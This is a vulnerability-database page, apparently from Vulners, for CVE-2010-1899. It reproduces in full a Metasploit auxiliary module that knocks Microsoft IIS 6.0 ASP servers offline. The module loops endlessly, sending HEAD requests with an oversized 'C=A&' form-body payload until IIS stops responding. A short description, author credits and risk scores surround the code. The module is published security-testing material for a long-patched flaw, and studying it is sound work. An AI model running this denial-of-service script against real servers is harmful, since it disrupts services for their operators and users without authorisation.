Lucene search
K

Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service

🗓️ 24 Nov 2010 20:10:01Reported by Heyder Andrade <[email protected]>, Leandro Oliveira <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 201 Views

Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service. Remote unauthenticated attackers can force IIS server to become unresponsive until manually restarted. ASP script reading Post Form value triggers the vulnerability

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service',
      'Description'    => %q{
          The vulnerability allows remote unauthenticated attackers to force the IIS server
        to become unresponsive until the IIS service is restarted manually by the administrator.
        Required is that Active Server Pages are hosted by the IIS and that an ASP script reads
        out a Post Form value.
      },
      'Author'         =>
        [
          'Heyder Andrade <heyder[at]alligatorteam.org>',
          'Leandro Oliveira <leadro[at]alligatorteam.org>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-1899' ],
          [ 'OSVDB', '67978'],
          [ 'MSB', 'MS10-065'],
          [ 'EDB', '15167' ]
        ],
      'DisclosureDate' => '2010-09-14'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('VHOST', [ false, 'The virtual host name to use in requests']),
        OptString.new('URI', [ true, 'URI to request', '/page.asp' ])
      ])
  end


  def run
    uri = datastore['URI']
    print_status("Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{uri}")

    begin
      while(1)
        begin
          connect
          payload = "C=A&" * 40000
          length = payload.size
          sploit = "HEAD #{uri} HTTP/1.1\r\n"
          sploit << "Host: #{datastore['VHOST'] || rhost}\r\n"
          sploit << "Connection:Close\r\n"
          sploit << "Content-Type: application/x-www-form-urlencoded\r\n"
          sploit << "Content-Length:#{length} \r\n\r\n"
          sploit << payload
          sock.put(sploit)
          #print_status("DoS packet sent.")
          disconnect
        rescue Errno::ECONNRESET
          next
        end
      end
    rescue Errno::EPIPE
      print_good("IIS should now be unavailable")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.7Low risk
Vulners AI Score0.7
CVSS 24.3
EPSS0.57231
201